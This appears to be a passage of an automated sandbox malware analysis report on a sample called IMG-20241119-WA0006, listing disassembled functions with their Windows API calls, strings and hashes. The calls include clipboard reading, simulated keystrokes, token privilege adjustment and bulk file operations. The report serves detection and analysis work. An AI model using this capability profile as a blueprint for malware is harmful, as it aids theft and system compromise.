Instruction Fuzzy Hash: 74D05E3290920DEBCB20CAA49904AD973A8DB05321F204754EE1583280D6759905B790

Function 00F5B704 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F5B719

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: a4effc9740565a4bf5d112c860487edda53a05e2e5f2387c80d6cca989b118ee
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 8DE0BF7494110DEFDB00DFA4D5496DD7BB4EF04302F1005A1FD05D7680DB309E549A62

Function 00F5B708 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F5B719

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: edce831e5c5b71d37e0242555ea876807438a9fb9b7d0e62aae7d53573de8e26
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 22E0E67494110DDFDB00DFB4D54969D7BB4EF04302F100161FD01D2280D7309D509A62

Non-executed Functions

Function 000EF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 000EF87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000EF8DC
GetWindowLongW.USER32(?,000000F0), ref: 000EF919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000EF940
SendMessageW.USER32 ref: 000EF966
_wcsncpy.LIBCMT ref: 000EF9D2
GetKeyState.USER32(00000011), ref: 000EF9F3
GetKeyState.USER32(00000009), ref: 000EFA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000EFA16
GetKeyState.USER32(00000010), ref: 000EFA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000EFA4F
SendMessageW.USER32 ref: 000EFA72
SendMessageW.USER32(?,00001030,?,000EE059), ref: 000EFB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 000EFB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000EFB96
SetCapture.USER32(?), ref: 000EFB9F
ClientToScreen.USER32(?,?), ref: 000EFC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000EFC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 000EFC29
ReleaseCapture.USER32 ref: 000EFC34
GetCursorPos.USER32(?), ref: 000EFC69
ScreenToClient.USER32(?,?), ref: 000EFC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 000EFCD8
SendMessageW.USER32 ref: 000EFD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 000EFD41
SendMessageW.USER32 ref: 000EFD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000EFD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 000EFD8F
GetCursorPos.USER32(?), ref: 000EFDB0
ScreenToClient.USER32(?,?), ref: 000EFDBD
GetParent.USER32(?), ref: 000EFDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 000EFE3F
SendMessageW.USER32 ref: 000EFE6F
ClientToScreen.USER32(?,?), ref: 000EFEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000EFEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 000EFF19
SendMessageW.USER32 ref: 000EFF3C
ClientToScreen.USER32(?,?), ref: 000EFF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000EFFB6
GetWindowLongW.USER32(?,000000F0), ref: 000F004B

Strings

@GUI_DRAGID, xrefs: 000EFBCC
F, xrefs: 000EFF42

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: dddb6ad85fae398c86bdbf956d999fd21713f8c53c1410f9ed12695c887fa9e0
Instruction ID: bac0d91f450249ff249e3b7ef4efb56af1b36a7eae5c8d68e91a8197e683fb9a
Opcode Fuzzy Hash: dddb6ad85fae398c86bdbf956d999fd21713f8c53c1410f9ed12695c887fa9e0
Instruction Fuzzy Hash: 8D32DB74604286AFDB20DF64C880BBABBE4FF49354F14462AF695A72B1CB71DC80CB51

Function 000EAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 000EB1CD

Strings

%d/%02d/%02d, xrefs: 000EAEFC

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: e4cb8a2133400c283ca6b68a3dff3b15ca1c430c11069c662991abe0af4fb997
Instruction ID: aabec196d00cf000734ce081becf73c41e90bc8ca00cc6126f0afe8b546fd0f2
Opcode Fuzzy Hash: e4cb8a2133400c283ca6b68a3dff3b15ca1c430c11069c662991abe0af4fb997
Instruction Fuzzy Hash: AE12BF71600248AFEB259F66DC49BAF7BF4FF49320F104169F916EA2D1DBB09941CB11

Function 0009EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0009EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000F3AEA
IsIconic.USER32(000000FF), ref: 000F3AF3
ShowWindow.USER32(000000FF,00000009), ref: 000F3B00
SetForegroundWindow.USER32(000000FF), ref: 000F3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000F3B20
GetCurrentThreadId.KERNEL32 ref: 000F3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 000F3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 000F3B54
SetForegroundWindow.USER32(000000FF), ref: 000F3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B6C
keybd_event.USER32(00000012,00000000), ref: 000F3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B81
keybd_event.USER32(00000012,00000000), ref: 000F3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B8F
keybd_event.USER32(00000012,00000000), ref: 000F3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B9E
keybd_event.USER32(00000012,00000000), ref: 000F3BA3
SetForegroundWindow.USER32(000000FF), ref: 000F3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 000F3BCD

Strings

Shell_TrayWnd, xrefs: 000F3AE5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: ef4ad7a4a696d27e29f16d01efd1642c8ed84e32d748898c67b45a970d95dce9
Instruction ID: 729ef3bdf2d76bfb6d0abddcffcb7bdd345ef03299c0bf1e40544e0032c75875
Opcode Fuzzy Hash: ef4ad7a4a696d27e29f16d01efd1642c8ed84e32d748898c67b45a970d95dce9
Instruction Fuzzy Hash: F7316F71A4021CBFEB316BA59C4AF7F7E6CEB44B60F104015FB45EA5D0DAF19D40AAA0

Function 000BACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 000BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
Part of subcall function 000BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
Part of subcall function 000BB134: GetLastError.KERNEL32 ref: 000BB1BA

_memset.LIBCMT ref: 000BAD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000BAD5A
CloseHandle.KERNEL32(?), ref: 000BAD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000BAD82
GetProcessWindowStation.USER32 ref: 000BAD9B
SetProcessWindowStation.USER32(00000000), ref: 000BADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000BADBF

Part of subcall function 000BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000BACC0), ref: 000BAB99
Part of subcall function 000BAB84: CloseHandle.KERNEL32(?,?,000BACC0), ref: 000BABAB

Strings

default, xrefs: 000BADBA
, xrefs: 000BAD17
winsta0, xrefs: 000BAD7D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 4576d6360e5c9af3a58795efc3f416452a18f14fa77ecf82781c2f83b2de891c
Instruction ID: 99d14787ef448094161cdb16b2e15c3bc26fcac710f39286999549dd2544818c
Opcode Fuzzy Hash: 4576d6360e5c9af3a58795efc3f416452a18f14fa77ecf82781c2f83b2de891c
Instruction Fuzzy Hash: AF818EB1A00209AFEF11DFE4DC45AEEBBB8FF05304F044129F924A6561DB728E55DB61

Function 000C60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1

Part of subcall function 000C725E: __wsplitpath.LIBCMT ref: 000C727B
Part of subcall function 000C725E: __wsplitpath.LIBCMT ref: 000C728E

Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC

_wcscat.LIBCMT ref: 000C6149
_wcscat.LIBCMT ref: 000C6167
__wsplitpath.LIBCMT ref: 000C618E
FindFirstFileW.KERNEL32(?,?), ref: 000C61A4
_wcscpy.LIBCMT ref: 000C6209
_wcscat.LIBCMT ref: 000C621C
_wcscat.LIBCMT ref: 000C622F
lstrcmpiW.KERNEL32(?,?), ref: 000C625D
DeleteFileW.KERNEL32(?), ref: 000C626E
MoveFileW.KERNEL32(?,?), ref: 000C6289
MoveFileW.KERNEL32(?,?), ref: 000C6298
CopyFileW.KERNEL32(?,?,00000000), ref: 000C62AD
DeleteFileW.KERNEL32(?), ref: 000C62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 000C62E1
FindClose.KERNEL32(00000000), ref: 000C62FD
FindClose.KERNEL32(00000000), ref: 000C630B

Strings

\*.*, xrefs: 000C6138, 000C6147, 000C6165

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: a49a765c52d9a123d5c36961ae5feb60eb0e5b392660f508fefaefb42a1f8f3f
Instruction ID: cf765eeaf80e08ec05d025df2188fa2b58a52d4ffd6bdc75e607a878d6db4e04
Opcode Fuzzy Hash: a49a765c52d9a123d5c36961ae5feb60eb0e5b392660f508fefaefb42a1f8f3f
Instruction Fuzzy Hash: 92510E7290811C6ACB21EB91DC44EEF77FCAF05310F0901EAE585E2142DE769789CFA4

Function 000D6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0011DC00), ref: 000D6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 000D6B44
GetClipboardData.USER32(0000000D), ref: 000D6B4C
CloseClipboard.USER32 ref: 000D6B58
GlobalLock.KERNEL32(00000000), ref: 000D6B74
CloseClipboard.USER32 ref: 000D6B7E
GlobalUnlock.KERNEL32(00000000), ref: 000D6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 000D6BA0
GetClipboardData.USER32(00000001), ref: 000D6BA8
GlobalLock.KERNEL32(00000000), ref: 000D6BB5
GlobalUnlock.KERNEL32(00000000), ref: 000D6BE9
CloseClipboard.USER32 ref: 000D6CF6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: f9958058cfbc9608f3c6daf072df63d0e359c2e97e34d47d74e0d5962bfaea6e
Instruction ID: 7264bfb048063a30417b7d8c1243912f9443676dcb0a09fdb9a4abcf1bbefcfa
Opcode Fuzzy Hash: f9958058cfbc9608f3c6daf072df63d0e359c2e97e34d47d74e0d5962bfaea6e
Instruction Fuzzy Hash: 66517071244301ABD310BBA0DD96FAE77A8AF94B11F00042AF586D62D2DFB1D9858B72

Function 000CF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000CF62B
FindClose.KERNEL32(00000000), ref: 000CF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000CF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000CF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 000CF6E2
__swprintf.LIBCMT ref: 000CF72E
__swprintf.LIBCMT ref: 000CF767
__swprintf.LIBCMT ref: 000CF7BB

Part of subcall function 000A172B: __woutput_l.LIBCMT ref: 000A1784

__swprintf.LIBCMT ref: 000CF809
__swprintf.LIBCMT ref: 000CF858
__swprintf.LIBCMT ref: 000CF8A7
__swprintf.LIBCMT ref: 000CF8F6

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 000CF728
%02d, xrefs: 000CF7B0, 000CF7B9, 000CF807, 000CF856, 000CF8A5, 000CF8F4
%4d, xrefs: 000CF761

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 0ed0892c9fca9a32571a62732136e212b98d6b927aff3d28982c22322a61fbdf
Instruction ID: 608f5d45f8ecd78455a4bb7892b671087b15c61e03b015d4c7d8ef7ace935659
Opcode Fuzzy Hash: 0ed0892c9fca9a32571a62732136e212b98d6b927aff3d28982c22322a61fbdf
Instruction Fuzzy Hash: F7A10CB2408344ABD710FBA4C885DEFB7ECBF98704F44092EF59582192EB34D949DB62

Function 000D1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000D1B50
_wcscmp.LIBCMT ref: 000D1B65
_wcscmp.LIBCMT ref: 000D1B7C
GetFileAttributesW.KERNEL32(?), ref: 000D1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 000D1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 000D1BC0
FindClose.KERNEL32(00000000), ref: 000D1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 000D1BE7
_wcscmp.LIBCMT ref: 000D1C0E
_wcscmp.LIBCMT ref: 000D1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 000D1C37
SetCurrentDirectoryW.KERNEL32(001339FC), ref: 000D1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 000D1C5F
FindClose.KERNEL32(00000000), ref: 000D1C6C
FindClose.KERNEL32(00000000), ref: 000D1C7C

Strings

*.*, xrefs: 000D1BE2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: f308e3a93116251aa49a700504a6a1fa7761ed5567ecb27801d4e59be6a81500
Instruction ID: 3a0a21db5c610979e1b01d9f176a1aac1ae524c92be15fb4461cf105431af203
Opcode Fuzzy Hash: f308e3a93116251aa49a700504a6a1fa7761ed5567ecb27801d4e59be6a81500
Instruction Fuzzy Hash: AF31A232A40719BADB10ABF0EC49ADE77EC9F05320F140197E811E3191EFB0DA858B64

Function 000D1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000D1CAB
_wcscmp.LIBCMT ref: 000D1CC0
_wcscmp.LIBCMT ref: 000D1CD7

Part of subcall function 000C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000C6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 000D1D06
FindClose.KERNEL32(00000000), ref: 000D1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 000D1D2D
_wcscmp.LIBCMT ref: 000D1D54
_wcscmp.LIBCMT ref: 000D1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 000D1D7D
SetCurrentDirectoryW.KERNEL32(001339FC), ref: 000D1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 000D1DA5
FindClose.KERNEL32(00000000), ref: 000D1DB2
FindClose.KERNEL32(00000000), ref: 000D1DC2

Strings

*.*, xrefs: 000D1D28

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 8e92b1243e5b0effcbd0b632f94d893eb7c4af083fafb95181c58cd7e8735ac0
Instruction ID: 3df46952a36b1e74e0c616900904d9035340ff2f5c3f147b249dd007ccc4bdcd
Opcode Fuzzy Hash: 8e92b1243e5b0effcbd0b632f94d893eb7c4af083fafb95181c58cd7e8735ac0
Instruction Fuzzy Hash: 9A31B03290471ABACF60ABE0EC49ADE77AE9F45324F140596F811A3291DF70DA85CB74

Function 00087D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00087DBD

Strings

], xrefs: 00087D9F
\, xrefs: 00087E1D
Q\E, xrefs: 000886D6
\, xrefs: 000FF95B
\, xrefs: 00087D89
\b(?<=\w), xrefs: 000FF877
[, xrefs: 00087E14
[:>:]], xrefs: 00087D37
\b(?=\w), xrefs: 000FF85E
^, xrefs: 00087D96
[:<:]], xrefs: 00087D1D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 8478a27fe59d7f95454b045b8ea3b8e433024d062637ad18aff3bc8e619692e8
Instruction ID: 0dd6ad5c057b8d771719e7a255e257ca267d48d554fb9ac2e9544b6a43cb074a
Opcode Fuzzy Hash: 8478a27fe59d7f95454b045b8ea3b8e433024d062637ad18aff3bc8e619692e8
Instruction Fuzzy Hash: 3982C071D0421ACBCB24DF94C8807FDBBB1BF48310F2981A9D999AB795E7709D85DB80

Function 000D091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000D09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 000D09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000D09FB
__wsplitpath.LIBCMT ref: 000D0A59
_wcscat.LIBCMT ref: 000D0A71
_wcscat.LIBCMT ref: 000D0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000D0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0AFF
_wcscpy.LIBCMT ref: 000D0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000D0B4A

Strings

*.*, xrefs: 000D0B05

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 3d2d46cbefdbd44b041c10c7f21588524b9d3656d414a920fb450289288cb0ae
Instruction ID: 3c673becf6fb8e730ee8063712609674b40b0c00742ce6e8c7690b073af8b41b
Opcode Fuzzy Hash: 3d2d46cbefdbd44b041c10c7f21588524b9d3656d414a920fb450289288cb0ae
Instruction Fuzzy Hash: 19614C725043059FD710EF60C845AAEB3E8FF89314F04891EF999C7252DB31E945CBA2

Function 000BA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
Part of subcall function 000BABBB: GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
